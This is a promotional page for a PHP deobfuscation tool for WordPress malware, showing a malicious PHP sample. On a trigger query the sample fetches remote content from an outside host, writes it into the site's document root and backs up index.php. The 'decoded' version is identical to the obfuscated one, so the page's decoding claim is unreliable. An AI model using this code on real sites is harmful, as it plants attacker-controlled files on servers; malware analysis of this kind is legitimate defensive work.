Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56'; $id = "zu32"; $oOoOoO = "http://zu32.rosejump.com"; $oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php"; $oOOoOooO = "http://zu32.rosejump.com/map_engine.php"; $oOOooOOo = "http://zu32.rosejump.com/...



Obfuscated php code

<?php $O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56';
$id = "zu32";
$oOoOoO = "http://zu32.rosejump.com";
$oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php";
$oOOoOooO = "http://zu32.rosejump.com/map_engine.php";
$oOOooOOo = "http://zu32.rosejump.com/products_engine.php";
$oOoOOoOo = $_SERVER["REQUEST_URI"];
$oOOooOOoOoOo = $_SERVER["QUERY_STRING"];
$oOOoOooOOoOo = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://";
$oOoOOooOoO = $_SERVER["SCRIPT_NAME"];
$oOOooOOoOooO = $_SERVER["DOCUMENT_ROOT"];
if ($oOoOOoOo == "/code_check" || $oOOooOOoOoOo == "code_check") {
    echo $oOoOOooOoO . $O[30] . $O[30] . $O[30] . $O[28] . $O[20] . $O[55] . $O[55] . $id;
    exit;
}
if ($oOOooOOoOoOo == $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13]) {
    file_put_contents($oOOooOOoOooO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[29] . $O[67] . $O[29], OOO($oOoOoO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[4] . $O[10] . $O[4]));
    copy($oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[5] . $O[29] . $O[67] . $O[29], $oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[61] . $O[50] . $O[44] . $O[20] . $O[5] . $O[4] . $O[10] . $O[4]);
    echo $oOOooOOoOoOo . $O[30] . $O[30] . $O[30] . $O[28] . $O[20];
    exit;
}

Decoded(de-Obfuscated) php code

<?php

$O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56';
$id = "zu32";
$oOoOoO = "http://zu32.rosejump.com";
$oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php";
$oOOoOooO = "http://zu32.rosejump.com/map_engine.php";
$oOOooOOo = "http://zu32.rosejump.com/products_engine.php";
$oOoOOoOo = $_SERVER["REQUEST_URI"];
$oOOooOOoOoOo = $_SERVER["QUERY_STRING"];
$oOOoOooOOoOo = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://";
$oOoOOooOoO = $_SERVER["SCRIPT_NAME"];
$oOOooOOoOooO = $_SERVER["DOCUMENT_ROOT"];
if ($oOoOOoOo == "/code_check" || $oOOooOOoOoOo == "code_check") {
    echo $oOoOOooOoO . $O[30] . $O[30] . $O[30] . $O[28] . $O[20] . $O[55] . $O[55] . $id;
    exit;
}
if ($oOOooOOoOoOo == $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13]) {
    file_put_contents($oOOooOOoOooO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[29] . $O[67] . $O[29], OOO($oOoOoO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[4] . $O[10] . $O[4]));
    copy($oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[5] . $O[29] . $O[67] . $O[29], $oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[61] . $O[50] . $O[44] . $O[20] . $O[5] . $O[4] . $O[10] . $O[4]);
    echo $oOOooOOoOoOo . $O[30] . $O[30] . $O[30] . $O[28] . $O[20];
    exit;
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.